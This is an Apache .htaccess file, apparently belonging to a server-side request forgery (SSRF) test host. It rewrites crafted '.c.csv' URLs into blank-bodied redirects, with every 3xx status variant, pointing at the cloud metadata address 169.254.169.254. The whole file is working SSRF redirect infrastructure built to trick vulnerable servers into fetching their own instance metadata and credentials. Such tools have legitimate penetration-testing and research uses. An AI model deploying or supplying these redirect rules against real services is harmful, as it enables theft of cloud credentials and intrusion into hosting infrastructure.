# Set blank response body
ErrorDocument 300 " "
ErrorDocument 301 " "
ErrorDocument 302 " "
ErrorDocument 303 " "
ErrorDocument 305 " "
ErrorDocument 307 " "
ErrorDocument 308 " "

# 300 with response body
# https://ssrf.localdomain.pw/csv-without-body-md/300-http-.c.csv
# https://ssrf.localdomain.pw/csv-without-body-md/300-http-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 300-([^/-]*)-(.*).c.csv$
RewriteRule 300-([^/-]*)-(.*).c.csv$ $1://169.254.169.254/$2 [L,R=300,NC]

# 301 with response body
# https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
# https://ssrf.localdomain.pw/csv-without-body-md/301-http-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 301-([^/-]*)-(.*).c.csv$
RewriteRule 301-([^/-]*)-(.*).c.csv$ $1://169.254.169.254/$2 [L,R=301,NC]

# 302 with response body
# https://ssrf.localdomain.pw/csv-without-body-md/302-http-.c.csv
# https://ssrf.localdomain.pw/csv-without-body-md/302-http-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 302-([^/-]*)-(.*).c.csv$
RewriteRule 302-([^/-]*)-(.*).c.csv$ $1://169.254.169.254/$2 [L,R=302,NC]

# 303 with response body
# https://ssrf.localdomain.pw/csv-without-body-md/303-http-.c.csv
# https://ssrf.localdomain.pw/csv-without-body-md/303-http-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 303-([^/-]*)-(.*).c.csv$
RewriteRule 303-([^/-]*)-(.*).c.csv$ $1://169.254.169.254/$2 [L,R=303,NC]

# 305 with response body
# https://ssrf.localdomain.pw/csv-without-body-md/305-http-.c.csv
# https://ssrf.localdomain.pw/csv-without-body-md/305-http-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 305-([^/-]*)-(.*).c.csv$
RewriteRule 305-([^/-]*)-(.*).c.csv$ $1://169.254.169.254/$2 [L,R=305,NC]

# 307 with response body
# https://ssrf.localdomain.pw/csv-without-body-md/307-http-.c.csv
# https://ssrf.localdomain.pw/csv-without-body-md/307-http-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 307-([^/-]*)-(.*).c.csv$
RewriteRule 307-([^/-]*)-(.*).c.csv$ $1://169.254.169.254/$2 [L,R=307,NC]

# 308 with response body
# https://ssrf.localdomain.pw/csv-without-body-md/308-http-.c.csv
# https://ssrf.localdomain.pw/csv-without-body-md/308-http-test/.c.csv
RewriteEngine on
RewriteCond %{REQUEST_URI} 308-([^/-]*)-(.*).c.csv$
RewriteRule 308-([^/-]*)-(.*).c.csv$ $1://169.254.169.254/$2 [L,R=308,NC]

# Always set the Content-Type header text/html
Header always set Content-Type text/html
# Always set Cache-Control to max-age=0, must-revalidate, no-cache, no-store, private
Header always set Cache-Control "max-age=0, must-revalidate, no-cache, no-store, private"
# Always set Pragma to no-cache
Header always set Pragma no-cache
